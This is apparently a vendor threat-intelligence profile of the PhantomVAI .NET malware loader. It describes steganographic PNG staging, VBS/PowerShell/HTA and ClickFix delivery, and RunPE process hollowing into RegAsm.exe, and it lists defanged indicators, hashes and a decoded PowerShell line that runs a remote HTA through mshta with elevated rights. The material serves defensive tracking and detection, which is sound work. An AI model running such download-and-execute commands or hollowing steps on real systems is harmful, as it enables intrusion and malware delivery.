PhantomVAI is a .NET-based Windows malware loader, described as a malware-as-a-service or loader-as-a-service offering, and also tracked as VMDetectLoader, VMDetector Loader, and Caminho Loader. It has been observed in global phishing and multi-stage delivery campaigns and is used to deliver a range of follow-on malware including Remcos RAT, XWorm, AsyncRAT, DarkCloud, SmokeLoader, ScorpioRAT, stealers, clippers, and infostealers.
The loader is commonly disguised as Microsoft.Win32.TaskScheduler.dll, including abuse of version 2.11.0.0 of the legitimate Microsoft Windows Task Scheduler library. It is a Babel-obfuscated PE32 .NET assembly and has been linked by researchers to the older open-source RunPE utility "Mandark," with code lineage indicated by the namespace "Hackforums.gigajew." Shared traits noted across samples include a "VAI" method and Portuguese-language strings. One report states PhantomVAI was originally sold on BreachForums by the user "katzadmin" as a delivery mechanism for Katz Stealer.
PhantomVAI executes payloads filelessly by loading extracted .NET assemblies directly into memory via Reflection.Assembly::Load, allowing execution entirely in RAM and reducing disk artifacts. In observed campaigns, it was staged inside PNG images hosted on Internet Archive, with the embedded assembly placed between BaseStart and BaseEnd markers. It has also been delivered through obfuscated VBS launchers, Base64-encoded PowerShell, HTA files executed via mshta.exe, and ClickFix-style social engineering pages that copy malicious PowerShell commands to the clipboard. Researchers documented infection chains involving malicious email attachments and links, fake PDF shortcuts, WebDAV delivery, batch scripts, and compromised websites.
Functionally, PhantomVAI downloads remote payloads from attacker-controlled URLs, processes them by reversing strings and decoding them as Base64 or hexadecimal, and then injects them into legitimate Windows processes using process hollowing / RunPE techniques. Reported target processes include RegAsm.exe. Its PE-mapping behavior includes creating a suspended host process, unmapping memory, allocating RWX memory, copying PE headers and sections, patching registers for relocation/import handling, and resuming execution. Additional behaviors directly reported include VM detection for VirtualBox, VMware, and VirtualPC, persistence via scheduled tasks and startup registry entries, and use of a UAC bypass DLL delivered in PNG format for privilege escalation.
Observed infrastructure and indicators tied to PhantomVAI campaigns include archive[.]org/download/optimized_msi_20250904/optimized_MSI[.]png hosting a steganographic image containing the loader; ia600606.us.archive[.]org/11/items/msi-pro-with-b-64_20251030/MSI_PRO_with_b64.png hosting a PNG with an embedded PhantomVAI assembly; hxxps://4a-m[.]al/ConvertedFile[.]txt used as a payload source; and news4me[.]xyz paths including /protector/johnremcos.txt and /uac.png used to deliver Remcos RAT and a UAC bypass DLL. Specific hashes reported include PhantomVAI loader DLL SHA256 adc2f550e7ff2b707a070ffaa50fc367af6a01c037f1f5b347c444cca3c9a650, HTA SHA256 020668f00325631bec2b9c6dd8596d7744e118f68424fdbb28eb2a318f3a7adf, steganographic image SHA256 656991f4dabe0e5d989be730dac86a2cf294b6b538b08d7db7a0a72f0c6c484b, and encoded payload ConvertedFile.txt SHA256 6f67c7441e31d448502050c9783a1032c307946323f29e41a82fb19915c59531.
PhantomVAI has been associated with campaigns targeting victims worldwide across broad sectors rather than a single vertical. High-confidence defensive observations from the reporting include monitoring for mshta.exe executing remote URLs, PowerShell spawned by mshta.exe, RegAsm.exe abuse, VBS and BAT execution from user-writable directories, in-memory .NET assembly loading, WebDAV usage, and outbound connections to staging or command-and-control infrastructure used by delivered payloads.
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
16 distinct techniques documented for this family, organized by ATT&CK tactic.
Once the assembly was loaded, the script dynamically resolved a specific class and invoked a method (VAI) responsible for orchestrating subsequent execution steps including additional payloads and persistence through scheduled tasks.
This execution pattern shows a separation of responsibilities: VBS file acts as an obfuscated launcher, PowerShell serves as a fileless delivery mechanism... Combined with batch scripting and PowerShell, this multi-language approach provides resilience against partial detection or containment.
The approach works by searching HTML response bodies for the co-occurrence of PowerShell download/execution cradle references and obfuscation indicators...
The HTA file ... contains an IIFE that creates a WScript.Shell object and constructs a PowerShell command from obfuscated fragments.
ClickFix is a social engineering technique where a web page instructs the victim to copy a command to their clipboard and paste it into a Windows Run dialog or terminal. | Users who would never download and run an executable will readily paste clipboard contents into a system prompt when presented with a convincing UI.
Once the assembly was loaded, the script dynamically resolved a specific class and invoked a method (VAI) responsible for orchestrating subsequent execution steps including additional payloads and persistence through scheduled tasks.
Process hollowing : Payload injected into RegAsm.exe (legitimate .NET utility) via RUNPE module
Threat actors are not using bare Invoke-WebRequest calls in cleartext HTML. They are using base64 encoding ... JavaScript obfuscation, string concatenation, eval() wrappers, String.fromCharCode construction, and clipboard API injection...
Distribution relies on steganography: the loader DLL is base64-encoded and embedded inside JPEG or GIF images between BaseStart- and -BaseEnd text markers...
Process hollowing : Payload injected into RegAsm.exe (legitimate .NET utility) via RUNPE module
Inject into target process via Mandark.Load() (process hollowing using CreateProcess suspended, ZwUnmapViewOfSection, VirtualAllocEx, WriteProcessMemory, SetThreadContext, ResumeThread)
Decoded (UTF-16LE): Start-Process mshta.exe hxxps://orcanmedikal[.]com[.]tr/tool[.]hta -Verb RunAs
21 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
5 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A .NET-based malware-as-a-service loader that uses steganography to hide a Babel-obfuscated DLL inside image files, performs VM detection, establishes persistence, and injects payloads into RegAsm.exe via RUNPE/process hollowing. It has delivered XWorm, RemcosRAT, AsyncRAT, FormBook, and DCRat.
An in-memory .NET loader hidden inside a PNG file that extracts and executes embedded content directly in RAM, then retrieves and launches follow-on payloads including Remcos RAT and a UAC bypass DLL.
A fileless .NET loader delivered via an obfuscated VBS and PowerShell chain, staged inside PNG files, and loaded reflectively in memory to execute additional payloads, persistence, and follow-on malware.
Custom Windows malware loader distributed via phishing that masquerades as legitimate software and uses RunPE/process hollowing to inject downloaded payloads into legitimate processes. Observed delivering multiple secondary payload families and operating in a suspected loader-as-a-service model (accepting arbitrary payload URLs as arguments).
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.